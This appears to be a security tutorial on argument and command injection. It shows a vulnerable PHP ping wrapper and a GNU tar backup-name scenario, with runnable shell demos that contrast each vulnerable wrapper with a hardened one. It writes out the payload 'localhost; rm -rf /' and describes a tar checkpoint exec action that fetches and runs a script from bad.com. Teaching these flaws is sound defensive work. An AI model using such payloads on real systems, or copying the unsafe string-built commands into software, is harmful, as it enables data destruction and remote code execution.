Argument Exploitation

The application runs an external program as part of its normal operation, building the command line from user input.

  • Example: create a backup of a database to a compressed file.

A crafted value can inject extra arguments into that program (argument injection) or chain user-controlled commands before or after it (command injection).

  • The expected program usually still runs, so the application sees nothing unusual.

  • But its behaviour is changed by the injected arguments, or other programs are called as well.

Examples

1.

<?php
    // Vulnerable: $host is concatenated straight into a shell command line
    // and system() hands the string to /bin/sh. No validation, no escaping.
    $host = $_POST["hostname"];
    $command = 'ping -c 3 ' . $host;
    system($command);
?>

The developer expects an IP address or hostname.

  • But performs no validation and no escaping (escapeshellarg() would have quoted the value as a single argument).

A custom payload can inject commands: hostname=localhost; rm -rf /

  • system() passes the string to /bin/sh, where ; ends the first command. The result is 2 commands: ping -c 3 localhost; rm -rf /
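The same injection written as a shell script, as an added example that is not from the original page: eval stands in for PHP's system() (both hand the string to /bin/sh to parse), and ping is replaced by a constructed stub function so the script runs offline. The function names and the allow-list pattern are this example's own choices.

```shell
#!/bin/sh
# Added example: string concatenation vs. a single quoted argument.
# Constructed stand-ins so this runs offline:
#   - ping() below replaces /bin/ping and only echoes its argument vector
#   - eval plays the role of PHP's system(): the joined string is re-parsed by sh

# Stand-in for /bin/ping: prints the argv it received.
ping() {
    printf 'PING argv=[%s]\n' "$*"
}

# Vulnerable: mirrors  system('ping -c 3 ' . $host).  The shell parses the
# joined string, so ';', '|', '&&' or '$(...)' inside $1 start new commands.
ping_vulnerable() {
    eval "ping -c 3 $1"
}

# Hardened: allow-list the value, then pass it as exactly one argv element.
# A quoted variable is never re-parsed, so shell metacharacters stay data,
# and rejecting a leading '-' keeps the value from being read as an option.
ping_safe() {
    case $1 in
        *[!A-Za-z0-9.:-]*|''|-*)
            echo "rejected: $1" >&2
            return 1 ;;
    esac
    ping -c 3 "$1"
}
```

Run ping_vulnerable 'localhost; echo INJECTED' and the stub is called once, then the second command executes; ping_safe refuses the same string and only ever forwards a single argument to the program.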

2.

The application asks the user for the name of the backup file and backs up a home directory:

A user provides the following name:

which results in the following command:

tar

The tar tool creates archives from files and directories (compressed ones with -z).

Because archiving can take a long time, GNU tar supports checkpoints: --checkpoint=NUMBER fires every NUMBERth record written or read, and --checkpoint-action=ACTION says what to do at each one, usually to report progress.

One of the available actions is exec=COMMAND, which tar hands to /bin/sh -c.

In this attack the checkpoint action is an exec= command that:

  • Gets a file from http://bad.com

  • Executes the file as a bash script

Because tar runs the action through /bin/sh with its own privileges, the attacker gets arbitrary command execution as the backup user, which is often root. The fix is the same as in example 1: validate the name and pass it to tar as a single, quoted argument (an argv element, not part of a string), so it can never become extra options.
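A runnable version of the tar scenario, as an added example that is not from the original page: the "downloaded" payload is a constructed local script standing in for the fetch from http://bad.com, the vulnerable wrapper mirrors a string-built tar command, and the hardened wrapper quotes and allow-lists the name. It needs GNU tar (checkpoints are a GNU extension) and works entirely inside a scratch directory; the function names, the backups directory and the allow-list are this example's own assumptions.

```shell
#!/bin/sh
# Added example: a user-supplied backup name turned into extra tar options.
# Requires GNU tar. Everything happens under a mktemp directory.

# Build the scenario: a "home directory" to back up, a backups directory
# the application writes to, and a constructed payload script standing in
# for the file fetched from http://bad.com. Sets WORK, HOME_DIR, BACKUP_DIR,
# PAYLOAD as globals.
setup_lab() {
    WORK=$(mktemp -d)
    HOME_DIR="$WORK/home/user"
    BACKUP_DIR="$WORK/backups"
    mkdir -p "$HOME_DIR" "$BACKUP_DIR"
    echo "secret notes" > "$HOME_DIR/notes.txt"
    # No spaces in the payload path: after word splitting it has to stay one
    # word so that --checkpoint-action=exec=<path> is a single tar argument.
    PAYLOAD="$WORK/payload.sh"
    printf '#!/bin/sh\necho PWNED > "%s/marker"\n' "$WORK" > "$PAYLOAD"
    chmod +x "$PAYLOAD"
}

# Vulnerable wrapper: mirrors  system("tar -czf $dir/" . $name . " ...").
# $1 is unquoted, so the shell splits it on whitespace and every word becomes
# its own argv element; tar parses words starting with "--" as options.
backup_vulnerable() {
    tar -czf $BACKUP_DIR/$1 -C "$2" . 2>/dev/null
}

# Hardened wrapper: allow-list the name (no spaces, no slashes, no leading
# dot or dash) and quote it, so -f consumes it whole as the archive name.
backup_safe() {
    case $1 in
        *[!A-Za-z0-9._-]*|''|.*|-*)
            echo "rejected: $1" >&2
            return 1 ;;
    esac
    tar -czf "$BACKUP_DIR/$1" -C "$2" .
}

# 0 if the payload ran (marker written by the checkpoint action), 1 otherwise.
payload_ran() {
    [ -f "$WORK/marker" ] && grep -q PWNED "$WORK/marker"
}

have_gnu_tar() {
    tar --version 2>/dev/null | grep -q 'GNU tar'
}

cleanup_lab() {
    rm -rf "$WORK"
}

# Walk through both wrappers with a malicious name: --checkpoint=1 fires on
# the first record, and exec= makes tar run the payload via /bin/sh -c.
demo() {
    setup_lab
    evil="backup.tgz --checkpoint=1 --checkpoint-action=exec=$PAYLOAD"
    backup_vulnerable "$evil" "$HOME_DIR"
    if payload_ran; then echo "vulnerable wrapper: payload executed"; fi
    rm -f "$WORK/marker"
    backup_safe "$evil" "$HOME_DIR" || echo "safe wrapper: name rejected"
    backup_safe home.tgz "$HOME_DIR" && echo "safe wrapper: wrote $BACKUP_DIR/home.tgz"
    cleanup_lab
}

have_gnu_tar && demo
```

The vulnerable wrapper still produces backup.tgz, so from the application's side the backup "worked"; only the marker file shows that the checkpoint action ran. Note that quoting alone already defeats the option injection here, because -f takes the whole next argument as the file name; the allow-list additionally blocks path traversal through names like ../../etc/cron.d/x.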
